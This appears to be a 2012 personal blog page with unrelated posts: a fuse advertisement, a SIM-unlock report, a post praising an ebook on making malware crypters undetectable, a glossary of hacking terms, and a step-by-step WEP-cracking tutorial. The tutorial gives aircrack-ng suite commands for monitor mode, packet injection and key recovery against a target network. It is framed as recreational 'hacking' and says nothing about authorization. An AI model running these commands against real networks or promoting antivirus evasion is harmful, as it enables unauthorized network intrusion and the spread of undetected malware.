Monday, August 6, 2012

All Kind Of Fuses

All Kind Of Fuses

If you would like to buy different  types of fuses online then click on the photo to visit the website for more information. This website was recommended by Mr Taylor. He had bought the fuse for a sewing machine. Remember, when buying a fuse, you need to look for the exact ampere and volt rating. If you really can't find the exact rating then the best is to use the one that have the nearest spec replacement.

Friday, March 30, 2012

Gevey Sim AIO,5.1 Tested!

Gevey Sim AIO,5.1 Tested!

Gevey Sim AIO Tested On 5.1 (2.0.10 BB)
Got it working with:


Tmobile/austria Unlock Done.

Now testing Orange/France..

---------- Post added at 12:48 PM ---------- Previous post was at 12:42 PM ----------

Tested Also on 5.1 4s

thanks ,..
credit goes to : shenics_16

Tuesday, March 6, 2012

This is an ebook that covers all the great methods of undetecting your crypter. It covers the concept of an encrypter, supplies helpful links to sources and despite the grammar slip ups it's a pretty legit read.
For those who are new to cryptography and those that are experienced.

Hackers Dictionary - Most used terms and definitions

I have put a small list of important terms together, which you should know.

0day exploit (zero day) - New exploit, that is not available publically.

JTR - John The Ripper

blackhat - Hackers, that do profit from their work and selling databases, credit cards, and other sensitive information.

greyhat - Hackers, that deface or show off their hacks.

whitehat - Hackers or Security Professionals that report vulnerabilities they found to the companies.

Bruteforce - Creating passwords and trying them. Mostly used in hash cracking.

DDoS - Distributed Denial of Service

DoS - Denial of Service

SQLi - SQL Injection, allows to spoof queries and get important data out of the database such as logins etc.


BSQLi - Blind SQL Injection, harder than the normal one and requires much more time.

XSS - Cross site scripting. Allows you to run CSS scripts on websites. Can be useful to steal cookies.

LFI - Local File Inclusion, allows to include a local page. Can be exploited and shell uploaded. Sometimes 
filtered, but you can bypass it using Null byte Injection .

RFI - Remote File Inclusion, allows you to include a page from a remote host. Usually parses the code into the .php file and executes it.

SSI - Server side includes, like code execution. Affected extensions: .shtm, .shtml and more.

RCE - Remote command/code execution, allows to execute code on the remote host.

Phishing - Creating a fake login page for commercial websites.

Wednesday, February 15, 2012

[TUT] BackTrack 5 - Cracking WEP

If you aren't very familiar with BackTrack, watch the video, if you are just follow these steps.

Open a new terminal where it says too!

- Open Terminal
airmon-ng start wlan0
airodump-ng mon0
CTRL+C to stop Scanning
airodump-ng -c (channel) -w (savingfile) --bssid (bssid) mon0

- Open New Terminal
aireplay-ng -1 0 -a (bssid) mon0
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b (bssid) mon0
Press Y when you get the prompt.

- Open New Terminal (25k Data)
aircrack-ng -n 64 -b (bssid) (savingfile)-01.cap

Thanks for Reading! Goodluck Hacking WEPs!

Friday, January 20, 2012



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